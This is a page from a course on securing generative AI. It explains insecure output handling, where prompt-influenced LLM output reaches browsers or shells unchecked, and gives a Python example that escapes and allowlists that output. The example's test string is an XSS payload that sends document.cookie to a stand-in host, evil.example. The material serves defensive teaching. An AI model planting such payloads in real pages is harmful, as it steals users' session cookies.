From the course: Securing Generative AI: Strategies, Methodologies, Tools, and Best Practices
Understanding insecure output handling attacks
- [Instructor] Insecure output handling occurs whenever there's inadequate validation, sanitization, and processing of the outputs generated by an AI application or large language model. These are failures to validate outputs before they're passed on to the systems or components they interact with, since the outputs, or the inference, can be influenced by user prompts. And, of course, giving users indirect access to additional systems and functionality is one of the issues we have here. Unlike over-reliance, which focuses on the broader risk of depending too much on the accuracy and reliability of LLM outputs, this vulnerability, insecure output handling, is specifically concerned with the handling of those outputs before they move downstream to other systems, whether that's a web browser, a system shell, and so on. Exploiting an insecure output handling vulnerability could lead to security issues like cross-site scripting or…
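The course doesn't show code at this point, but a minimal Python sketch can make the downstream-handling idea concrete: treat the model's output as untrusted input, escape it before it reaches a web browser, and validate it before it reaches a system shell. The helper names `render_llm_output` and `run_llm_suggested_command`, and the `ALLOWED_COMMANDS` allowlist, are hypothetical illustrations, not part of the course.

```python
import html
import shlex
import subprocess

# Hypothetical allowlist of commands the application is willing to run.
ALLOWED_COMMANDS = {"ls", "whoami", "date"}

def render_llm_output(llm_output: str) -> str:
    """Escape model output before inserting it into an HTML page, so a
    <script> tag an attacker coaxed out of the LLM renders as inert text."""
    return html.escape(llm_output)

def run_llm_suggested_command(llm_output: str) -> str:
    """Treat a model-suggested command as untrusted: tokenize it, check it
    against an allowlist, and never hand the raw string to a shell."""
    parts = shlex.split(llm_output)
    if not parts or parts[0] not in ALLOWED_COMMANDS:
        raise ValueError(f"Command not permitted: {llm_output!r}")
    # shell=False prevents injection via metacharacters like ; or &&
    result = subprocess.run(parts, capture_output=True, text=True, shell=False)
    return result.stdout

if __name__ == "__main__":
    malicious = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
    print(render_llm_output(malicious))  # displayed as text, never executed
```

The design choice here is the same one the transcript describes: the sanitization step sits between the LLM and the downstream component (browser or shell), so prompt-influenced output can't carry an exploit across that boundary.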
Contents
- Learning objectives (1m 1s)
- Defining prompt injection attacks (11m 41s)
- Exploring real-life prompt injection attacks (3m 57s)
- Using ChatML for OpenAI API calls to indicate to the LLM the source of prompt input (10m 4s)
- Enforcing privilege control on LLM access to back-end systems (6m 10s)
- Best practices around API tokens for plugins, data access, and function-level permissions (3m 2s)
- Understanding insecure output handling attacks (3m 22s)
- Using the OWASP ASVS to protect against insecure output handling (4m 43s)